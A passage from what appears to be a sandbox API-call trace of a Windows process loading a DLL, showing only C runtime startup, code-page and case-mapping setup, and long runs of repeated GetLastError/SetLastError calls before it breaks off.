lpProcName="DecodePointer") returned 0x77f1cd10 [0033.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.320] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.320] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.320] GetCurrentThreadId () returned 0xbd4 [0033.320] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"Install\"" [0033.320] GetEnvironmentStringsW () returned 0x77850* [0033.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13809f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.321] FreeEnvironmentStringsW (penv=0x77850) returned 1 [0033.321] GetStartupInfoA (in: lpStartupInfo=0x26f6ec | out: lpStartupInfo=0x26f6ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.321] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.321] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.321] SetHandleCount (uNumber=0x20) returned 0x20 [0033.321] GetLastError () returned 0x0 [0033.321] SetLastError (dwErrCode=0x0) [0033.321] GetLastError () returned 0x0 [0033.321] SetLastError (dwErrCode=0x0) [0033.321] GetLastError () returned 0x0 [0033.321] SetLastError (dwErrCode=0x0) [0033.321] GetACP () returned 0x4e4 [0033.321] GetLastError () returned 0x0 [0033.321] SetLastError (dwErrCode=0x0) [0033.321] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.321] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f6cc | out: lpCPInfo=0x26f6cc) returned 1 [0033.321] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f198 | out: lpCPInfo=0x26f198) returned 1 [0033.321] GetLastError () returned 0x0 [0033.321] SetLastError (dwErrCode=0x0) [0033.321] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f128 | out: lpCharType=0x26f128) returned 1 [0033.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x26ef18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0033.321] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f1ac | out: lpCharType=0x26f1ac) returned 1 [0033.321] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x26eee8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.322] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.322] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26ecd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f4ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÏ\x1bµôäö&", lpUsedDefaultChar=0x0) returned 256 [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f5ac, cbMultiByte=256, lpWideCharStr=0x26ef08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.322] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.322] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26ecf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f3ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÏ\x1bµôäö&", lpUsedDefaultChar=0x0) returned 256 [0033.322] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.322] SetLastError (dwErrCode=0x0) [0033.322] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.323] SetLastError (dwErrCode=0x0) [0033.323] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.324] SetLastError (dwErrCode=0x0) [0033.324] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.325] SetLastError (dwErrCode=0x0) [0033.325] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.326] SetLastError (dwErrCode=0x0) [0033.326] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.327] SetLastError (dwErrCode=0x0) [0033.327] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.328] SetLastError (dwErrCode=0x0) [0033.328] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.329] SetLastError (dwErrCode=0x0) [0033.329] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError 